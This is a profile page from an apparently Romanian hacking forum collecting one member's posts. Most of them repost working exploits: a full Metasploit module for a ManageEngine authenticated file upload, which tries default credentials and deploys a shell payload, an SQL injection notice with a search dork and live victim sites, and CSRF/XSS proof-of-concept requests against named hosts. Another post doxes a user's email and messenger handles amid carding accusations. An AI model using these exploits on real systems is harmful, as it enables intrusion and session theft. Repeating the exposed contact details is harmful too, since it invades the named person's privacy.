Jump to content

1488

Members
  • Posts

    19
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by 1488

  1. Ceea ce scrisese @Kronzy este un carder pus pe tepe cu foarte multe conturi pe forum. In plus toate informatiile sunt publice, au fost extrase din posturile pe care le-a facut aici si pe alte forumuri (din pacate pentru el, unele de carding - vezi altenen. c o m). Esti prost si fudul, stai acasa! Daca iesi in fata, te lovesti la ceas!

    kronZy @ RST aka kron @ HY aka RoKH @ HY @ RST aka 321 @ RST aka 1488 @ RST YM: s_sonic86@yahoo.com ; pasal39@yahoo.com

    Skype: badboy_hacker17 GMail: kronzyalin@gmail.com ICQ: 698551938

    YM: root.kronzy@yahoo.com Jabber: kronzy1337@jabber.ru

    badboy17 @ RST Jabber: badboy17@jabber.ru ICQ: 698551938 YM: badboy_hacker17@yahoo.com

    Castiel @ RST YM: pasal39@yahoo.com

    Si sincer faci grosolanii d-astea ? Intri pe toate, folosind masini virtuale, proxies si VPN ca sa dai -rep si dislike ? De pe unu te certi, de pe altu faci copy-paste-uri, de pe altu vinzi chestii...Unde am ajuns si incotro se indreapta forumul asta?

    Adevarat frate! Mi-am luat un Lamborghini Veneno o casa in Dubai si vro 3-4 apartamente prin Las Vegas , ce sa mai zic am un cont in Elvetia cu 40 milioane de dolari , un elicopter , avion privat si un iaht. Toate astea le-am luat dupa tepele care le-am dat pe Ebay si Amazon. P.S : Off.

    P.S 2 : Nu sunt Castiel , Badboy , si ce ai mai zis tu pe acolo.

  2. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
    super(update_info(info,
    'Name' => 'ManageEngine Multiple Products Authenticated File Upload',
    'Description' => %q{
    This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
    AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
    the upload does not handle correctly '../' sequences, which can be abused to write
    in the file system. Authentication is needed to exploit this vulnerability, but this module
    will attempt to login using the default credentials for the administrator and guest
    accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
    combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
    versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
    SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
    module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
    been tested successfully in Windows and Linux on several versions.
    },
    'Author' =>
    [
    'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
    ],
    'License' => MSF_LICENSE,
    'References' =>
    [
    ['CVE', '2014-5301'],
    ['OSVDB', '116733'],
    ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
    ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
    ],
    'DefaultOptions' => { 'WfsDelay' => 30 },
    'Privileged' => false, # Privileged on Windows but not on Linux targets
    'Platform' => 'java',
    'Arch' => ARCH_JAVA,
    'Targets' =>
    [
    [ 'Automatic', { } ],
    [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
    {
    'attachment_path' => '/workorder/Attachment.jsp'
    }
    ],
    [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
    {
    'attachment_path' => '/common/FileAttachment.jsp'
    }
    ],
    [ 'IT360 v8-v10.4',
    {
    'attachment_path' => '/common/FileAttachment.jsp'
    }
    ]
    ],
    'DefaultTarget' => 0,
    'DisclosureDate' => 'Dec 15 2014'))

    register_options(
    [
    Opt::RPORT(8080),
    OptString.new('JSESSIONID',
    [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
    OptString.new('IAMAGENTTICKET',
    [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
    OptString.new('USERNAME',
    [true, 'The username to login as', 'guest']),
    OptString.new('PASSWORD',
    [true, 'Password for the specified username', 'guest']),
    OptString.new('DOMAIN_NAME',
    [false, 'Name of the domain to logon to'])
    ], self.class)
    end


    def get_version
    res = send_request_cgi({
    'uri' => '/',
    'method' => 'GET'
    })

    # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
    version = [ 9999, 9999, 0, 'sd' ]

    if res && res.code == 200
    if res.body.to_s =~ /ManageEngine ServiceDesk/
    if res.body.to_s =~ /  \|  ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
    output = $1
    version = [output[0].to_i, output[2].to_i, '0', 'sd']
    end
    if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds
    version[2] = $1.to_i
    elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds
    version[2] = $1.to_i
    end
    elsif res.body.to_s =~ /ManageEngine AssetExplorer/
    if res.body.to_s =~ /ManageEngine AssetExplorer  ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
    res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
    output = $1
    version = [output[0].to_i, output[2].to_i, 0, 'ae']
    end
    if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
    version[2] = $1.to_i
    end
    elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
    # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
    version[3] = 'sc'
    if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
    # ... but get the build number if we can find it
    version[2] = $1.to_i
    end
    elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
    # IT360 newer versions
    version[3] = 'it'
    end
    elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
    # IT360 older versions, not a very good detection string but there is no alternative?
    version[3] = 'it'
    end

    version
    end


    def check
    version = get_version
    # TODO: put fixed version on the two ifs below once (if...) products are fixed
    # sd was fixed on build 9031
    # ae and sc still not fixed
    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
    (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
    (version[3] == 'sc' && version[2] < 99999)
    return Exploit::CheckCode::Appears
    end

    if (version[2] > 9030 && version[3] == 'sd') ||
    (version[2] > 99999 && version[3] == 'ae') ||
    (version[2] > 99999 && version[3] == 'sc')
    return Exploit::CheckCode::Safe
    else
    # An IT360 check always lands here, there is no way to get the version easily
    return Exploit::CheckCode::Unknown
    end
    end


    def authenticate_it360(port, path, username, password)
    if datastore['DOMAIN_NAME'] == nil
    vars_post = {
    'LOGIN_ID' => username,
    'PASSWORD' => password,
    'isADEnabled' => 'false'
    }
    else
    vars_post = {
    'LOGIN_ID' => username,
    'PASSWORD' => password,
    'isADEnabled' => 'true',
    'domainName' => datastore['DOMAIN_NAME']
    }
    end

    res = send_request_cgi({
    'rport' => port,
    'method' => 'POST',
    'uri' => normalize_uri(path),
    'vars_get' => {
    'service' => 'ServiceDesk',
    'furl' => '/',
    'timestamp' => Time.now.to_i
    },
    'vars_post' => vars_post
    })

    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
    # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
    return res.get_cookies
    else
    return nil
    end
    end


    def get_it360_cookie_name
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri("/")
    })
    cookie = res.get_cookies
    if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
    return $1
    else
    return nil
    end
    end


    def login_it360
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['IAMAGENTTICKET']
    cookie_name = get_it360_cookie_name
    cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
    return cookie
    end

    # get the correct path, host and port
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri('/')
    })

    if res && res.redirect?
    uri = [ res.redirection.port, res.redirection.path ]
    else
    return nil
    end

    cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])

    if cookie != nil
    return cookie
    elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
    # we've tried with the default guest password, now let's try with the default admin password
    cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
    if cookie != nil
    return cookie
    else
    # Try one more time with the default admin login for some versions
    cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
    if cookie != nil
    return cookie
    end
    end
    end

    nil
    end


    #
    # Authenticate and validate our session cookie. We need to submit credentials to
    # j_security_check and then follow the redirect to HomePage.do to create a valid
    # authenticated session.
    #
    def authenticate(cookie, username, password)
    res = send_request_cgi!({
    'method' => 'POST',
    'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
    'ctype' => 'application/x-www-form-urlencoded',
    'cookie' => cookie,
    'vars_post' => {
    'j_username' => username,
    'j_password' => password,
    'logonDomainName' => datastore['DOMAIN_NAME']
    }
    })
    if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
    # sd and ae respond with 302 while sc responds with a 200
    return true
    else
    return false
    end
    end


    def login
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['JSESSIONID'] != nil
    cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
    return cookie
    end

    # First we get a valid JSESSIONID to pass to authenticate()
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri('/')
    })
    if res && res.code == 200
    cookie = res.get_cookies
    authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
    if authenticated
    return cookie
    elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
    # we've tried with the default guest password, now let's try with the default admin password
    authenticated = authenticate(cookie, 'administrator', 'administrator')
    if authenticated
    return cookie
    else
    # Try one more time with the default admin login for some versions
    authenticated = authenticate(cookie, 'admin', 'admin')
    if authenticated
    return cookie
    end
    end
    end
    end

    nil
    end


    def send_multipart_request(cookie, payload_name, payload_str)
    if payload_name =~ /\.ear/
    upload_path = '../../server/default/deploy'
    else
    upload_path = rand_text_alpha(4+rand(4))
    end

    post_data = Rex::MIME::Message.new

    if @my_target == targets[1]
    # old style
    post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
    post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
    post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
    post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
    post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
    post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
    post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
    post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
    else
    post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
    post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
    post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
    end

    data = post_data.to_s
    res = send_request_cgi({
    'uri' => normalize_uri(@my_target['attachment_path']),
    'method' => 'POST',
    'data' => data,
    'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
    'cookie' => cookie
    })
    return res
    end


    def pick_target
    return target if target.name != 'Automatic'

    version = get_version
    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
    (version[0] == 4 && version[3] == 'ae') ||
    (version[3] == 'sc')
    # These are all "old style" versions (sc is always old style)
    return targets[1]
    elsif version[3] == 'it'
    return targets[3]
    else
    return targets[2]
    end
    end


    def exploit
    if check == Exploit::CheckCode::Safe
    fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
    end

    print_status("#{peer} - Selecting target...")
    @my_target = pick_target
    print_status("#{peer} - Selected target #{@my_target.name}")

    if @my_target == targets[3]
    cookie = login_it360
    else
    cookie = login
    end

    if cookie.nil?
    fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
    end

    # First we generate the WAR with the payload...
    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => war_app_base })

    # ... and then we create an EAR file that will contain it.
    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
    app_xml << '<application>'
    app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
    app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
    app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"

    # Zipping with CM_STORE to avoid errors while decompressing the zip
    # in the Java vulnerable application
    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
    ear_file.add_file('META-INF/application.xml', app_xml)
    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'

    if @my_target != targets[3]
    # Linux doesn't like it when we traverse non existing directories,
    # so let's create them by sending some random data before the EAR.
    # (IT360 does not have a Linux version so we skip the bogus file for it)
    print_status("#{peer} - Uploading bogus file...")
    res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
    if res && res.code != 200
    fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
    end
    end

    # Now send the actual payload
    print_status("#{peer} - Uploading EAR file...")
    res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
    if res && res.code == 200
    print_status("#{peer} - Upload appears to have been successful")
    else
    fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
    end

    10.times do
    select(nil, nil, nil, 2)

    # Now make a request to trigger the newly deployed war
    print_status("#{peer} - Attempting to launch payload in deployed WAR...")
    res = send_request_cgi({
    'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
    'method' => 'GET'
    })
    # Failure. The request timed out or the server went away.
    break if res.nil?
    # Success! Triggered the payload, should have a shell incoming
    break if res.code == 200
    end
    end
    end

    Source : ManageEngine Multiple Products Authenticated File Upload ? Packet Storm

    • Upvote 1
  3. [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
    [+]
    [+]Exploit Title : Invem CMS SQL INJECTION Vulnerability
    [+]
    [+]Exploit Author : Ashiyane Digital Security Team
    [+]
    [+]Vendor Homepage: http://www.invem.com/
    [+]
    [+]Google Dork : intext:Powered by INVEM.
    [+]
    [+]Date : 20 / Jan / 2015
    [+]
    [+]Tested On : windows se7en + linux Kali + Google Chrome + Mozilla
    [+]
    [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
    [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> DEMO <~ ~ ~
    [+]
    [+] http://www.onemart.cc/news_view.php?newsid=124%27
    [+]
    [+] http://www.jcptdc.com/about.php?id=1%27
    [+]
    [+] http://www.plmgroup.cn/news_view.php?newsid=122%27
    [+]
    [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
    [+]
    [+] Discovered by : SeRaVo.BlackHat [+] Hassan [+]
    [+]
    [+] ~ General.BlackHat@Gmail.com ~ https://www.facebook.com/general.blackhat
    [+]
    [+] ~ Unitazad@YaHoo.com ~ https://twitter.com/strip_ssl
    [+]
    [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
    [+]
    [+] MY FRIEND'Z : Unhex.coder + #N3T + Lupin 13 + AMOK + Milad.Hacking + 3cure BlackHat + Dr.3vil
    [+] Mr.Time + SHD.N3T + MR.M@j!D + eb051 + RAMIN + ACC3SS + X3UR + 4li.BlackHat + IraQeN-H4XORZ
    [+] Dj.TiniVini + NoL1m1t + l4tr0d3ctism + r3d_s0urc3 + 0x0ptim0us + E1.Coders + MR.F@RDIN
    [+] 0xTiger + C4T + Predator + S!Y0U.T4r.6T + soheil.hidd3n + Soldier + Spoofer + Cyb3r_Dr4in
    [+] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + G3N3Rall + Mr.XHat
    [+]
    [+] And All Iranian Cyber Army ...\.
    [+] Home : Ashiyane.org/Forum
    [+]
    [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]


    Source : Sites Powered By INVEM SQL Injection ? Packet Storm

  4. Document Title:
    ===============
    Remote Web Desktop Full 5.9.5 - Multiple Vulnerabilities


    References (Source):
    ====================
    http://www.vulnerability-lab.com/get_content.php?id=1409


    Release Date:
    =============
    2015-01-19


    Vulnerability Laboratory ID (VL-ID):
    ====================================
    1409


    Common Vulnerability Scoring System:
    ====================================
    2.4


    Product & Service Introduction:
    ===============================
    Remote Web Desktop enable you remotely manage & control your Android device from the computer web browser over wireless connection.

    (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=net.xdevelop.rmp )


    Abstract Advisory Information:
    ==============================
    An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Web Desktop Full v5.9.5 Android application.


    Vulnerability Disclosure Timeline:
    ==================================
    2015-01-19: Public Disclosure (Vulnerability Laboratory)


    Discovery Status:
    =================
    Published


    Affected Product(s):
    ====================
    SmartDog Studio HK
    Product: Remote Web Desktop Full 5.9.5


    Exploitation Technique:
    =======================
    Remote


    Severity Level:
    ===============
    Medium


    Technical Details & Description:
    ================================
    Multiple cross site request forgery and cross site scripting vulnerabilities has been discovered in the Remote Web Desktop Full 5.9.5 Android mobile web-application.
    The mobile web-application is vulnerable to a combination of cross site request forgery and cross site scripting attacks.

    1.1
    The cross site scripting vulnerabilities are located in `to` value of the `sendSMS.json` file in the send sms function.
    The attackers needs to `Create new a contact` or `Create a contact group` with a malicious payload as name to inject.
    The execution occurs after the refresh inside of the main message module.

    Request Method(s):
    [+] [GET]

    Vulnerable Parameter(s):
    [+] to

    1.2
    The cross site request forgery vulnerabilities are located in the `makeCall.json`,`sendSMS.json`,`addTextFile.json`,
    `deleteFile.json` files. Remote attackers are able prepare special crafted URLs that executes client-side requests
    to execute application functions (delete,add, call, send).

    Request Method(s):
    [+] [GET]

    Vulnerable Parameter(s):
    [+] makeCall.json
    [+] sendSMS.json
    [+] addTextFile.json
    [+] deleteFile.json


    Proof of Concept (PoC):
    =======================
    1.1
    The cross site request forgery vulnerability can be exploited by remote attackers without privileged application user account and with medium or high user interaction.
    For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

    Call Phone Number
    <img src="http://localhost:8999/makeCall.json?phoneNo=11111111111" width="0" height="0" border="0">

    --- PoC Session Logs [GET] (Execution) ---
    GET /makeCall.json?phoneNo=11111111111 HTTP/1.1
    Host: 192.168.1.3:8999
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: image/png,image/*;q=0.8,*/*;q=0.5
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: RemoteMobileSession=-658409909345357946
    Connection: keep-alive

    HTTP/1.1 200 OK
    Cache-control: no-cache
    Content-length: 4
    true


    Send SMS:
    --- PoC Session Logs [GET] (Execution) ---
    <img src="http://localhost:8999/sendSMS.json?to=333&content=Hello""width="0" height="0" border="0">

    GET /sendSMS.json?to=333&content=Hello HTTP/1.1
    Host: 192.168.1.3:8999
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: image/png,image/*;q=0.8,*/*;q=0.5
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: RemoteMobileSession=-658409909345357946
    Connection: keep-alive

    HTTP/1.1 200 OK
    Cache-control: no-cache
    Content-length: 30

    SMS to 333 sent successfully


    Create File:
    --- PoC Session Logs [GET] (Execution) ---
    <img src="http://localhost:8999/addTextFile.json?id=/folder&name=file" width="0" height="0" border="0">

    GET /addTextFile.json?id=/folder/&name=file HTTP/1.1
    Host: 192.168.1.3:8999
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: image/png,image/*;q=0.8,*/*;q=0.5
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: RemoteMobileSession=-658409909345357946
    Connection: keep-alive

    HTTP/1.1 200 OK
    Cache-control: no-cache
    Content-length: 26

    /folder/file


    Delete File:
    <img src="http://localhost:8999/deleteFile.json?id=/file" width="0" height="0" border="0">

    GET /deleteFile.json?id=%2Fmnt%2Femmc%2Faissak%7C HTTP/1.1
    Host: 192.168.1.3:8999
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: image/png,image/*;q=0.8,*/*;q=0.5
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: RemoteMobileSession=-658409909345357946
    Connection: keep-alive

    HTTP/1.1 200 OK
    Cache-control: no-cache
    Content-length: 4
    true

    Reference:
    http://localhost:8999/


    1.2
    The application-side input validation web vulnerabilities can be exploited by local low privileged application account or remote attackers with low user interaction.
    For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

    Application-Side Cross Site Scripting
    --- PoC Session Logs [GET] (Execution) ---
    GET /sendSMS.json?to=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&content=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&uid=1421297818963 HTTP/1.1
    Host: 192.168.1.3:8999
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: text/plain; charset=utf-8
    Referer: http://192.168.1.3:8999/
    Cookie: RemoteMobileSession=-6603034196170561541
    Connection: keep-alive

    HTTP/1.1 200 OK
    Cache-control: no-cache
    Content-length: 68

    SMS to <img src=x onerror=alert(/XSS/)> sent failed: Unknown Error

    --- PoC Session Logs [GET] (Execution) ---
    Create new a contact or a contact group with the payload as name "<img src=x onerror=alert(/XSS/)>" and click the contact button to save


    Reference:
    http://localhost:8999/


    Security Risk:
    ==============
    1.1
    The security risk of the cross site request forgery web vulnerabilities are estimated as medium. (CVSS 2.2)

    1.2
    The security risk of the application-side input validation web vulnerability is estimated as medium. (CVSS 2.4)


    Credits & Authors:
    ==================
    Hadji Samir s-dz@hotmail.fr


    Disclaimer & Information:
    =========================
    The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
    or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
    in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
    or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
    consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
    policies, deface websites, hack into databases or trade with fraud/stolen material.

    Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
    Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
    Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
    Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
    Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
    electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
    Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
    is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
    (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Source : Remote Web Desktop Full 5.9.5 Cross Site Request Forgery / Cross Site Scripting ? Packet Storm

  5. Document Title:
    ===============
    Webinars v2.2.26.0 - Client Side Cross Site Vulnerability


    References (Source):
    ====================
    http://www.vulnerability-lab.com/get_content.php?id=1412


    Release Date:
    =============
    2015-01-19


    Vulnerability Laboratory ID (VL-ID):
    ====================================
    1412


    Common Vulnerability Scoring System:
    ====================================
    2.4


    Product & Service Introduction:
    ===============================
    http://www.webinars.com


    Abstract Advisory Information:
    ==============================
    An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the Webinars v2.2.26.0 conference web-application.


    Vulnerability Disclosure Timeline:
    ==================================
    2015-01-19: Public Disclosure (Vulnerability Laboratory)


    Discovery Status:
    =================
    Published


    Affected Product(s):
    ====================

    Exploitation Technique:
    =======================
    Remote


    Severity Level:
    ===============
    Medium


    Technical Details & Description:
    ================================
    A client-side cross site scripting vulnerability has been discovered in the official InterCall Webinar v2.2.26.0 conference web-application.
    The vulnerability allows remote attackers to hijack website customer, moderator or admin session data by client-side cross site requests.

    The vulnerability is located in the `meeting_id` value of the `viewer.php` file. Remote attackers are able to inject malicious script codes to
    client-side web-application requests. Remote attackers uses a validation error in the viewer.php file to execute client-side script code in the
    webinar web-application context. The client-side script code execution occurs in the same file after a site refresh. The attack vector is located
    on the client-side of the service and the request method to inject the script code is `GET`.

    The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4.
    Exploitation of the client-side remote vulnerability requires low or medium user interaction and no privileged application user account. Successful exploitation
    results in client-side account theft by hijacking, client-side phishing, client-side external redirects and client-side manipulation of affected and connected
    module web context.

    Vulnerable Service(s):
    [+] Webinars

    Vulnerable File(s):
    [+] viewer.php

    Vulnerable Parameter(s):
    [+] meeting_id


    Proof of Concept (PoC):
    =======================
    The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged applicaiton user account and low or medium user interaction.
    For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


    --- PoC Session Logs [GET] ---
    GET /viewer.php?meeting_id=%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E HTTP/1.1
    Host: webinars.snm.org
    -
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    -
    HTTP/1.1 200 OK
    Date: Fri, 16 Jan 2015 18:10:12 GMT
    Server: Apache/2.2.3 (CentOS)
    X-Powered-By: PHP/5.1.6
    Content-Length: 3044
    Connection: close
    Content-Type: text/html; charset=UTF-8


    PoC: Webinar

    <body >
    <div id='message_box' class='message' style='visibility:hidden'>
    <div class='box_header'><a onclick="ShowMessage(false, ''); return false;" href='javascript:void(0)'>
    [ X ]</a></div>
    <p id='message_text'>
    </p>
    </div>
    <div id='page_box' class='page' style='visibility:hidden'>
    <div class='box_header'><a onclick="ShowPageBox(false); return false;" href='javascript:void(0)'>
    [ X ]</a></div>
    <iframe id='page_content' src=''></iframe>

    </div>
    <div id='sharing_box' class='page' style='visibility:hidden'>
    <div class='box_header'><a onclick="ShowSharingBox(false); return false;" href='javascript:void(0)'>
    [ X ]</a></div>
    <iframe id='sharing_content' src=''></iframe>[CLIENT-SIDE SCRIPT CODE EXECUTION!]
    </div>
    <div id="flashcontent">
    <object id="viewer" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="100%" height="100%">
    <param name="flashvars" value="MeetingServer=http://meetingengine.glcollaboration.com/wc2_22260/api.php&MeetingID=">'><SCRIPT>alert('samir')</SCRIPT>&HasFSCommand=1&UrlTarget=_self&2142738052" />
    <param name="movie" value="viewer.swf?1719627766" />
    <param name="swliveconnect" value="true" />
    <param name="wmode" value="opaque" />
    <param name="allowScriptAccess" value="always" />
    <param name="allowFullScreen" value="true" />

    <object data="viewer.swf?1719627766" flashvars="MeetingServer=http://meetingengine.glcollaboration.com/wc2_22260/api.php&MeetingID=">'><SCRIPT>alert('samir')</SCRIPT>&HasFSCommand=1&UrlTarget=_self&2142738052" width="100%" height="100%"
    swliveconnect=true name="viewer" wmode="opaque" allowFullScreen="true" allowScriptAccess="always"
    type="application/x-shockwave-flash">
    <div class="noflash">
